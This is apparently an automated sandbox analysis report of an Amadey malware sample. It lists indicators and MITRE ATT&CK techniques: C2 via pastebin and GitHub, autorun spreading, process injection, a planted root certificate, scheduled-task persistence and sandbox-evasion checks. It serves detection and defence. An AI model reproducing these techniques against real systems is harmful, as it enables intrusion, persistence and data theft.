amadey | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

description	ioc	Process
File opened (read-only)	\??\D:	imgdisk.exe
File opened (read-only)	\??\E:	imgdisk.exe
File opened (read-only)	\??\L:	imgdisk.exe
File opened (read-only)	\??\P:	imgdisk.exe
File opened (read-only)	\??\T:	imgdisk.exe
File opened (read-only)	\??\B:	imgdisk.exe
File opened (read-only)	\??\I:	imgdisk.exe
File opened (read-only)	\??\M:	imgdisk.exe
File opened (read-only)	\??\Q:	imgdisk.exe
File opened (read-only)	\??\R:	imgdisk.exe
File opened (read-only)	\??\S:	imgdisk.exe
File opened (read-only)	\??\G:	imgdisk.exe
File opened (read-only)	\??\K:	imgdisk.exe
File opened (read-only)	\??\N:	imgdisk.exe
File opened (read-only)	\??\O:	imgdisk.exe
File opened (read-only)	\??\A:	imgdisk.exe
File opened (read-only)	\??\F:	imgdisk.exe
File opened (read-only)	\??\H:	imgdisk.exe
File opened (read-only)	\??\J:	imgdisk.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
9	raw.githubusercontent.com
161	pastebin.com
176	pastebin.com
613	raw.githubusercontent.com
614	raw.githubusercontent.com
1	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
621	ip-api.com
11	ip-api.com
71	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Drops autorun.inf file 1 TTPs 5 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	F:\autorun.inf	conhost.exe
File opened for modification	F:\autorun.inf	conhost.exe
File created	C:\autorun.inf	conhost.exe
File opened for modification	C:\autorun.inf	conhost.exe
File created	D:\autorun.inf	conhost.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

persistence privilege_escalation

Process Discovery

T1057

pid	Process
2252	tasklist.exe
1440	tasklist.exe

Suspicious use of SetThreadContext 13 IoCs

description	pid	Process	procid_target
PID 1640 set thread context of 5008	1640	xworm.exe	115
PID 4252 set thread context of 1176	4252	zzzz1.exe	129
PID 1336 set thread context of 3452	1336	winupsecvmgr.exe	134
PID 1336 set thread context of 4496	1336	winupsecvmgr.exe	135
PID 4972 set thread context of 5908	4972	msedge.exe	164
PID 1696 set thread context of 5676	1696	osupdater.exe	300
PID 1696 set thread context of 5524	1696	osupdater.exe	302
PID 1696 set thread context of 3300	1696	osupdater.exe	301
PID 2876 set thread context of 2032	2876	crypted25.exe	399
PID 4016 set thread context of 5248	4016	osupdater.exe	425
PID 4016 set thread context of 3872	4016	osupdater.exe	424
PID 4016 set thread context of 5160	4016	osupdater.exe	423
PID 1184 set thread context of 6044	1184	CFXBypass.exe	484

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x001d00000002abb8-4534.dat	upx
behavioral1/memory/3840-4540-0x0000000000400000-0x0000000000425000-memory.dmp	upx

Drops file in Windows directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Windows\TrainsSexcam	PharmaciesDetection.exe
File opened for modification	C:\Windows\GamingNat	PharmaciesDetection.exe
File opened for modification	C:\Windows\XiMilton	PharmaciesDetection.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe	FreeYoutubeDownloader.exe
File created	C:\Windows\sysnldcvmr.exe	m.exe
File opened for modification	C:\Windows\MissWheat	PharmaciesDetection.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe	FreeYoutubeDownloader.exe
File opened for modification	C:\Windows\PermitLite	PharmaciesDetection.exe
File opened for modification	C:\Windows\JennyArtistic	PharmaciesDetection.exe
File opened for modification	C:\Windows\SgLaid	PharmaciesDetection.exe
File opened for modification	C:\Windows\FacingLone	PharmaciesDetection.exe
File opened for modification	C:\Windows\GeniusRepeat	PharmaciesDetection.exe
File opened for modification	C:\Windows\EditedRights	PharmaciesDetection.exe
File opened for modification	C:\Windows\sysnldcvmr.exe	m.exe
File created	C:\Windows\Tasks\Gxtuum.job	ywx.exe
File opened for modification	C:\Windows\PolyphonicWeblog	PharmaciesDetection.exe
File created	C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini	FreeYoutubeDownloader.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Detects Pyinstaller 1 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x001c00000002ab64-4011.dat	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Program crash 2 IoCs

pid	pid_target	Process	procid_target
4824	1640	WerFault.exe	114
3540	3492	WerFault.exe	196

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stail.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	stail.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	zzzz1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	systeminfo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hdvideoconverterfox125.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	out_test_sig.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FC93.tmp.x.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	crypted25.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1417232562.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msedge.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Channel1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Discord2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LedgerUpdater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	267368583.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	shell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xworm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	30072024.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CFXBypass.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	hashed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	792930788.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	o.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	aspnet_regiis.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	m.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AppLaunch.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ywx.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	imgdisk.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	payload.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	3546345.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winvnc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nova.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Buyer.pif
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	4363463463464363463463463.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tpeinf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	FreeYoutubeDownloader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	update.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	conhost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

Internet Connection Discovery

T1016.001

pid	Process
4220	cmd.exe
1300	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

Wi-Fi Discovery

T1016.002

pid	Process
2180	netsh.exe

Checks processor information in registry 2 TTPs 12 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	noll.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	hashed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	3546345.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	3546345.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Channel1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Channel1.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Buyer.pif
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	stealc_valenciga.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	stealc_valenciga.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	noll.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	hashed.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Buyer.pif

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
5656	timeout.exe
3368	timeout.exe
2944	timeout.exe
4796	timeout.exe
5932	timeout.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
788	systeminfo.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
5300	taskkill.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	Explorer.EXE
Key created	\REGISTRY\USER\S-1-5-21-3973800497-2716210218-310192997-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	Explorer.EXE

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	30072024.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	30072024.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
1300	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
5168	schtasks.exe
5300	schtasks.exe
904	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
5908	InstallUtil.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1124	stail.tmp
1124	stail.tmp
3176	svchost.exe
2188	554524981.exe
796	powershell.exe
796	powershell.exe
908	powershell.exe
4936	2534135603.exe
4936	2534135603.exe
908	powershell.exe
1180	powershell.exe
1180	powershell.exe
4936	2534135603.exe
4936	2534135603.exe
1336	winupsecvmgr.exe
1336	winupsecvmgr.exe
2392	powershell.exe
2392	powershell.exe
1336	winupsecvmgr.exe
1336	winupsecvmgr.exe
1336	winupsecvmgr.exe
1336	winupsecvmgr.exe
2036	powershell.exe
2036	powershell.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
1784	out_test_sig.exe
1784	out_test_sig.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe
2088	conhost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
2088	conhost.exe
3264	Explorer.EXE

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
664	Process not Found
664	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2364	4363463463464363463463463.exe
Token: SeDebugPrivilege	3176	svchost.exe
Token: SeDebugPrivilege	3176	svchost.exe
Token: SeDebugPrivilege	2188	554524981.exe
Token: SeDebugPrivilege	2716	Eszop.exe
Token: SeDebugPrivilege	796	powershell.exe
Token: SeDebugPrivilege	908	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeIncreaseQuotaPrivilege	1180	powershell.exe
Token: SeSecurityPrivilege	1180	powershell.exe
Token: SeTakeOwnershipPrivilege	1180	powershell.exe
Token: SeLoadDriverPrivilege	1180	powershell.exe
Token: SeSystemProfilePrivilege	1180	powershell.exe
Token: SeSystemtimePrivilege	1180	powershell.exe
Token: SeProfSingleProcessPrivilege	1180	powershell.exe
Token: SeIncBasePriorityPrivilege	1180	powershell.exe
Token: SeCreatePagefilePrivilege	1180	powershell.exe
Token: SeBackupPrivilege	1180	powershell.exe
Token: SeRestorePrivilege	1180	powershell.exe
Token: SeShutdownPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeSystemEnvironmentPrivilege	1180	powershell.exe
Token: SeRemoteShutdownPrivilege	1180	powershell.exe
Token: SeUndockPrivilege	1180	powershell.exe
Token: SeManageVolumePrivilege	1180	powershell.exe
Token: 33	1180	powershell.exe
Token: 34	1180	powershell.exe
Token: 35	1180	powershell.exe
Token: 36	1180	powershell.exe
Token: SeIncreaseQuotaPrivilege	1180	powershell.exe
Token: SeSecurityPrivilege	1180	powershell.exe
Token: SeTakeOwnershipPrivilege	1180	powershell.exe
Token: SeLoadDriverPrivilege	1180	powershell.exe
Token: SeSystemProfilePrivilege	1180	powershell.exe
Token: SeSystemtimePrivilege	1180	powershell.exe
Token: SeProfSingleProcessPrivilege	1180	powershell.exe
Token: SeIncBasePriorityPrivilege	1180	powershell.exe
Token: SeCreatePagefilePrivilege	1180	powershell.exe
Token: SeBackupPrivilege	1180	powershell.exe
Token: SeRestorePrivilege	1180	powershell.exe
Token: SeShutdownPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeSystemEnvironmentPrivilege	1180	powershell.exe
Token: SeRemoteShutdownPrivilege	1180	powershell.exe
Token: SeUndockPrivilege	1180	powershell.exe
Token: SeManageVolumePrivilege	1180	powershell.exe
Token: 33	1180	powershell.exe
Token: 34	1180	powershell.exe
Token: 35	1180	powershell.exe
Token: 36	1180	powershell.exe
Token: SeIncreaseQuotaPrivilege	1180	powershell.exe
Token: SeSecurityPrivilege	1180	powershell.exe
Token: SeTakeOwnershipPrivilege	1180	powershell.exe
Token: SeLoadDriverPrivilege	1180	powershell.exe
Token: SeSystemProfilePrivilege	1180	powershell.exe
Token: SeSystemtimePrivilege	1180	powershell.exe
Token: SeProfSingleProcessPrivilege	1180	powershell.exe
Token: SeIncBasePriorityPrivilege	1180	powershell.exe
Token: SeCreatePagefilePrivilege	1180	powershell.exe
Token: SeBackupPrivilege	1180	powershell.exe
Token: SeRestorePrivilege	1180	powershell.exe
Token: SeShutdownPrivilege	1180	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe
Token: SeSystemEnvironmentPrivilege	1180	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1124	stail.tmp
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe
4496	dwm.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
3176	svchost.exe
5908	InstallUtil.exe
2032	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2364 wrote to memory of 2444	2364	4363463463464363463463463.exe	82
PID 2364 wrote to memory of 2444	2364	4363463463464363463463463.exe	82
PID 2364 wrote to memory of 2444	2364	4363463463464363463463463.exe	82
PID 2444 wrote to memory of 1124	2444	stail.exe	83
PID 2444 wrote to memory of 1124	2444	stail.exe	83
PID 2444 wrote to memory of 1124	2444	stail.exe	83
PID 1124 wrote to memory of 2252	1124	stail.tmp	84
PID 1124 wrote to memory of 2252	1124	stail.tmp	84
PID 1124 wrote to memory of 2252	1124	stail.tmp	84
PID 2252 wrote to memory of 1508	2252	net.exe	87
PID 2252 wrote to memory of 1508	2252	net.exe	87
PID 2252 wrote to memory of 1508	2252	net.exe	87
PID 1124 wrote to memory of 2304	1124	stail.tmp	86
PID 1124 wrote to memory of 2304	1124	stail.tmp	86
PID 1124 wrote to memory of 2304	1124	stail.tmp	86
PID 2364 wrote to memory of 420	2364	4363463463464363463463463.exe	88
PID 2364 wrote to memory of 420	2364	4363463463464363463463463.exe	88
PID 2364 wrote to memory of 3452	2364	4363463463464363463463463.exe	90
PID 2364 wrote to memory of 3452	2364	4363463463464363463463463.exe	90
PID 2364 wrote to memory of 3452	2364	4363463463464363463463463.exe	90
PID 2364 wrote to memory of 492	2364	4363463463464363463463463.exe	91
PID 2364 wrote to memory of 492	2364	4363463463464363463463463.exe	91
PID 2364 wrote to memory of 3176	2364	4363463463464363463463463.exe	92
PID 2364 wrote to memory of 3176	2364	4363463463464363463463463.exe	92
PID 2364 wrote to memory of 4200	2364	4363463463464363463463463.exe	93
PID 2364 wrote to memory of 4200	2364	4363463463464363463463463.exe	93
PID 2364 wrote to memory of 4200	2364	4363463463464363463463463.exe	93
PID 4200 wrote to memory of 2360	4200	m.exe	95
PID 4200 wrote to memory of 2360	4200	m.exe	95
PID 4200 wrote to memory of 2360	4200	m.exe	95
PID 2360 wrote to memory of 2188	2360	sysnldcvmr.exe	96
PID 2360 wrote to memory of 2188	2360	sysnldcvmr.exe	96
PID 2188 wrote to memory of 584	2188	554524981.exe	97
PID 2188 wrote to memory of 584	2188	554524981.exe	97
PID 2188 wrote to memory of 2036	2188	554524981.exe	99
PID 2188 wrote to memory of 2036	2188	554524981.exe	99
PID 584 wrote to memory of 1856	584	cmd.exe	101
PID 584 wrote to memory of 1856	584	cmd.exe	101
PID 2036 wrote to memory of 2472	2036	cmd.exe	102
PID 2036 wrote to memory of 2472	2036	cmd.exe	102
PID 2360 wrote to memory of 3628	2360	sysnldcvmr.exe	103
PID 2360 wrote to memory of 3628	2360	sysnldcvmr.exe	103
PID 2360 wrote to memory of 3628	2360	sysnldcvmr.exe	103
PID 2364 wrote to memory of 4960	2364	4363463463464363463463463.exe	104
PID 2364 wrote to memory of 4960	2364	4363463463464363463463463.exe	104
PID 2364 wrote to memory of 4960	2364	4363463463464363463463463.exe	104
PID 4960 wrote to memory of 4220	4960	LedgerUpdater.exe	105
PID 4960 wrote to memory of 4220	4960	LedgerUpdater.exe	105
PID 4960 wrote to memory of 4220	4960	LedgerUpdater.exe	105
PID 4220 wrote to memory of 1300	4220	cmd.exe	107
PID 4220 wrote to memory of 1300	4220	cmd.exe	107
PID 4220 wrote to memory of 1300	4220	cmd.exe	107
PID 2364 wrote to memory of 2716	2364	4363463463464363463463463.exe	108
PID 2364 wrote to memory of 2716	2364	4363463463464363463463463.exe	108
PID 2360 wrote to memory of 2692	2360	sysnldcvmr.exe	109
PID 2360 wrote to memory of 2692	2360	sysnldcvmr.exe	109
PID 2360 wrote to memory of 2692	2360	sysnldcvmr.exe	109
